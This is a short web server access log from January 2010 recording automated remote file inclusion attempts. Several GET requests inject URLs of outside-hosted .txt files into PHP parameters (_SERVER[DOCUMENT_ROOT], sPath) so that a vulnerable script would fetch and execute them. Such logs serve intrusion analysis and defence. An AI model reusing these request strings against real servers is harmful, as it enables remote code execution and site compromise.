211.218.126.236 - - [05/Jan/2010:03:14:08 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:09 -0500] "GET /logs//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:09 -0500] "GET /logs/access_log.Q109122000%20%20//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:09 -0500] "GET //include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
